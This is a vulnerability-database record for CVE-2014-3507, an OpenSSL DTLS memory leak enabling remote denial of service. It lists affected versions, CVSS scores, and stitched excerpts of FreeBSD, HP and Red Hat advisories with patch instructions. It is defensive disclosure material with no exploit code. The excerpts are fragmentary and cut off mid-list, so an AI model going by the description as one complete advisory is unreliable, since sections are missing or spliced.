"model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "6.4-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null } ], "sources": [ { "db": "BID", "id": "69078" }, { "db": "JVNDB", "id": "JVNDB-2014-003811" }, { "db": "CNNVD", "id": "CNNVD-201408-131" }, { "db": "NVD", "id": "CVE-2014-3507" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8za:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8w:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8v:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3507" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Adam Langley of Google", "sources": [ { "db": "BID", "id": "69078" }, { "db": "CNNVD", "id": "CNNVD-201408-131" } ], "trust": 0.9 }, "cve": "CVE-2014-3507", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2014-3507", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3507", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201408-131", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-3507", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3507" }, { "db": "JVNDB", "id": "JVNDB-2014-003811" }, { "db": "CNNVD", "id": "CNNVD-201408-131" }, { "db": "NVD", "id": "CVE-2014-3507" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function. OpenSSL is prone to a denial-of-service vulnerability. \nAttackers may exploit this issue to cause a memory leak, resulting in a denial-of-service condition. \nThe following versions are vulnerable:\nOpenSSL 0.9.8 versions prior to 0.9.8zb. \nOpenSSL 1.0.0 versions prior to 1.0.0n. \nOpenSSL 1.0.1 versions prior to 1.0.1i. \n - The SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"Poodle\", which could be exploited remotely\nresulting in disclosure of information. \nCorrected: 2014-08-07 21:04:42 UTC (stable/10, 10.0-STABLE)\n 2014-09-09 10:09:46 UTC (releng/10.0, 10.0-RELEASE-p8)\n 2014-08-07 21:06:34 UTC (stable/9, 9.3-STABLE)\n 2014-09-09 10:13:46 UTC (releng/9.3, 9.3-RELEASE-p1)\n 2014-09-09 10:13:46 UTC (releng/9.2, 9.2-RELEASE-p11)\n 2014-09-09 10:13:46 UTC (releng/9.1, 9.1-RELEASE-p18)\n 2014-08-07 21:06:34 UTC (stable/8, 8.4-STABLE)\n 2014-09-09 10:13:46 UTC (releng/8.4, 8.4-RELEASE-p15)\nCVE Name: CVE-2014-3506, CVE-2014-3507, CVE-2014-3508, CVE-2014-3510,\n CVE-2014-3509, CVE-2014-3511, CVE-2014-3512, CVE-2014-5139\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e. Background\n\nFreeBSD includes software from the OpenSSL Project. \n\nII. [CVE-2014-5139]\n\nIII. Additionally, a remote attacker may be able\nto run arbitrary code on a vulnerable system if the application has been\nset up for SRP. \n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.0]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch.asc\n# gpg --verify openssl-10.0.patch.asc\n\n[FreeBSD 9.3]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch.asc\n# gpg --verify openssl-9.3.patch.asc\n\n[FreeBSD 9.2, 9.1, 8.4]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch.asc\n# gpg --verify openssl-9.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:http://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\n3) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r269687\nreleng/8.4/ r271305\nstable/9/ r269687\nreleng/9.1/ r271305\nreleng/9.2/ r271305\nreleng/9.3/ r271305\nstable/10/ r269686\nreleng/10.0/ r271304\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:http://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. \n\nDetailed descriptions of the vulnerabilities can be found at:\nhttps://www.openssl.org/news/secadv_20140806.txt\n\nIt\u0027s important that you upgrade the libssl1.0.0 package and not just\nthe openssl package. Alternatively, you may reboot your system. \n\nFor the testing distribution (jessie), these problems will be fixed\nsoon. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04426586\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04426586\nVersion: 1\n\nHPSBOV03099 rev.1 - HP OpenVMS running OpenSSL, Remote Denial of Service\n(DoS) or Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-09-12\nLast Updated: 2014-09-12\n\nPotential Security Impact: Remote Denial of Service (DoS), disclosure of\ninformation\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP OpenVMS\nrunning OpenSSL. \n\nReferences:\n\nCVE-2014-3505 - Remote Denial of Service (DoS)\nCVE-2014-3506 - Remote Denial of Service (DoS)\nCVE-2014-3507 - Remote Denial of Service (DoS)\nCVE-2014-3508 - Remote Disclosure of Information\nCVE-2014-3510 - Remote Denial of Service (DoS)\n\nSSRT101686\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP SSL Version 1.4-476 and earlier for OpenVMS\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-3505 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3506 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3507 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-3510 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software update available to resolve the\nvulnerabilities with HP OpenVMS running OpenSSL. \n\n HP SSL Version 1.4-493 for OpenVMS is available from the following\nlocation:\n\n http://h71000.www7.hp.com/openvms/products/ssl/ssl.html\n\nHISTORY\nVersion:1 (rev.1) - 12 September 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2014:1052-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1052.html\nIssue date: 2014-08-13\nCVE Names: CVE-2014-3505 CVE-2014-3506 CVE-2014-3507 \n CVE-2014-3508 CVE-2014-3509 CVE-2014-3510 \n CVE-2014-3511 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nA race condition was found in the way OpenSSL handled ServerHello messages\nwith an included Supported EC Point Format extension. A malicious server\ncould possibly use this flaw to cause a multi-threaded TLS/SSL client using\nOpenSSL to write into freed memory, causing the client to crash or execute\narbitrary code. (CVE-2014-3509)\n\nIt was discovered that the OBJ_obj2txt() function could fail to properly\nNUL-terminate its output. This could possibly cause an application using\nOpenSSL functions to format fields of X.509 certificates to disclose\nportions of its memory. (CVE-2014-3508)\n\nA flaw was found in the way OpenSSL handled fragmented handshake packets. \nA man-in-the-middle attacker could use this flaw to force a TLS/SSL server\nusing OpenSSL to use TLS 1.0, even if both the client and the server\nsupported newer protocol versions. (CVE-2014-3511)\n\nMultiple flaws were discovered in the way OpenSSL handled DTLS packets. \nA remote attacker could use these flaws to cause a DTLS server or client\nusing OpenSSL to crash or use excessive amounts of memory. (CVE-2014-3505,\nCVE-2014-3506, CVE-2014-3507)\n\nA NULL pointer dereference flaw was found in the way OpenSSL performed a\nhandshake when using the anonymous Diffie-Hellman (DH) key exchange. A\nmalicious server could cause a DTLS client using OpenSSL to crash if that\nclient had anonymous DH cipher suites enabled. (CVE-2014-3510)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\n\nppc64:\nopenssl-1.0.1e-16.el6_5.15.ppc.rpm\nopenssl-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.ppc.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.ppc.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-16.el6_5.15.s390.rpm\nopenssl-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.s390.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.s390.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.15.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-static-1.0.1e-16.el6_5.15.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 